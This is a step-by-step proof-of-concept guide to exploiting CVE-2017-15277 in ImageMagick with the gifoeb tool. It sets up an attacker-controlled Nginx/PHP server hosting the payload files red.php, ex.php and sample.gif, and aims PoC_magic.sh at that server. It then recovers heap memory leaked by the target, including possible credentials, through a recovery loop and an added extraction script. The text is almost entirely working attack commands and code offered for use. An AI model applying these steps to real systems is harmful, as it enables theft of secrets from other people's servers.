POC/howto.txt
***Server Set-up***
1. Spin up a server on the Internet. I used an AWS Kali Linux instance.
2. Install and start the Nginx service (the original command had the `service` arguments reversed):
    `$ sudo apt-get install nginx && sudo service nginx start`
3. Install PHP and set up a LEMP stack (Nginx + PHP-FPM) so the server can execute the PoC's .php files. Follow one of these guides:
On Kali : https://medium.com/@jangid.hitesh2112/how-to-install-lamp-stack-on-kali-linux-183fa4f48d16 (this guide covers a LAMP/Apache stack; if you keep Nginx, only its PHP steps apply)
On Ubuntu:
    1. https://thishosting.rocks/install-php-on-ubuntu/
    2. https://www.digitalocean.com/community/tutorials/how-to-install-linux-nginx-mysql-php-lemp-stack-in-ubuntu-16-04#step-3-install-php-for-processing

***Host PoC Files on the Internet***
1. SCP the PoC files red.php and ex.php to the server.
    1. On a Mac, for example: $ scp red.php ex.php root@ServerIP:~/
2. Edit red.php and ex.php so the URL inside them points at our server's address on the Internet,
    1. something like "http://AttackerServerDNSName/red.php".
3. Move the edited red.php and ex.php into /var/www/html (Nginx's default web root on Debian-based systems).
4. Git clone the neex/gifoeb repository and move sample.gif from the gifoeb exploit repository into /var/www/html. Before moving on, confirm the files are actually served, e.g. `curl -I http://AttackerServerDNSName/sample.gif` should return HTTP 200 with an image/gif content type.

***Attacker Set-Up***
1. Change directory into gifoeb and create a 'previews' directory (mkdir previews). Move the PoC_magic.sh file into previews.
2. Edit PoC_magic.sh so its payload URL points at our Internet server hosting the PoC files.
3. Make PoC_magic.sh executable: chmod +x PoC_magic.sh (chmod 777 works too, but world-writable is more than the script needs; it only has to be executable by you).
4. Run PoC_magic.sh. It should generate jpg files in the previews folder. If the previews show colorful, noise-like pixels instead of the sample image, the target is vulnerable to CVE-2017-15277: ImageMagick's GIF reader left the palette uninitialized, so the pixels are heap memory of the converting process rendered as colors.
5. In the previews folder, with the jpg's generated by the PoC script, run `for p in ./*.jpg; do ../gifoeb recover "$p" | strings >> result.txt; done; cat result.txt`. (Globbing `./*.jpg` rather than `./*` keeps result.txt itself, and the script, from being fed back into recover on later runs.)
Examine result.txt for leaked memory contents: readable strings from the target process, such as paths, configuration fragments or credentials.
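The recovery loop in step 5 is fine for a one-off, but it mixes every preview's output into a single file, feeds result.txt back into itself on a second run, and aborts nothing when gifoeb chokes on a truncated download. The script below is an added example (my own code, not part of the gifoeb project or of this PoC) that automates the attacker-side extraction per preview. It assumes gifoeb is checked out one directory up (`../gifoeb recover`, overridable via RECOVER), that previews are .jpg files, and it uses a tr/grep stand-in for `strings -n` so it does not depend on binutils; the function names extract_leaks and printable_runs are mine.

```shell
#!/bin/sh
# Added example, not code from the gifoeb project or the original PoC.
# For every preview the PoC script pulled into ./previews it runs
# "gifoeb recover", keeps the raw bytes and the printable strings per
# preview (so you know WHICH preview leaked what), survives previews that
# recover cannot parse, and prints how many previews leaked anything.
# Assumptions: gifoeb lives at ../gifoeb (override with RECOVER) and the
# previews are .jpg files.

LC_ALL=C; export LC_ALL                    # byte-wise [:print:] matching
RECOVER="${RECOVER:-../gifoeb recover}"   # assumed location of the gifoeb checkout
MIN_LEN="${MIN_LEN:-6}"                   # like `strings -n 6`: drop short noise

# printable_runs <file>: portable stand-in for `strings -n $MIN_LEN`.
# Non-printable bytes become newlines, then only runs >= MIN_LEN survive.
printable_runs() {
    tr -c '[:print:]' '\n' < "$1" | grep -E "^.{$MIN_LEN,}$" || :
}

# extract_leaks <previews_dir> <out_dir>
# Writes <out_dir>/<name>.bin (raw recovered bytes) and <name>.txt (strings)
# per preview plus a merged, de-duplicated <out_dir>/result.txt, and prints
# the number of previews that yielded at least one string.
extract_leaks() {
    dir=$1; out=$2
    mkdir -p "$out"
    leaked=0
    for p in "$dir"/*.jpg; do
        [ -f "$p" ] || continue           # unmatched glob: nothing to do
        name=$(basename "$p" .jpg)
        # $RECOVER is intentionally unquoted so "../gifoeb recover" splits
        # into command and subcommand. A truncated or corrupt preview makes
        # recover fail: note it and move on instead of aborting the run.
        if ! $RECOVER "$p" > "$out/$name.bin" 2> "$out/$name.err"; then
            echo "$name: recover failed, see $out/$name.err" >&2
            continue
        fi
        printable_runs "$out/$name.bin" > "$out/$name.txt"
        count=$(grep -c . "$out/$name.txt" || :)
        echo "$name: $count strings" >&2
        if [ "$count" -gt 0 ]; then leaked=$((leaked + 1)); fi
    done
    cat "$out"/*.txt 2>/dev/null | sort -u > "$out/result.txt" || :
    echo "$leaked"
}

# Typical use from the gifoeb checkout:
#   n=$(extract_leaks previews leaks); echo "$n previews leaked"; less leaks/result.txt
```

Per-preview .bin files are worth keeping: strings only shows ASCII runs, and a hexdump of the raw bytes often reveals pointers or structured data that the string view hides.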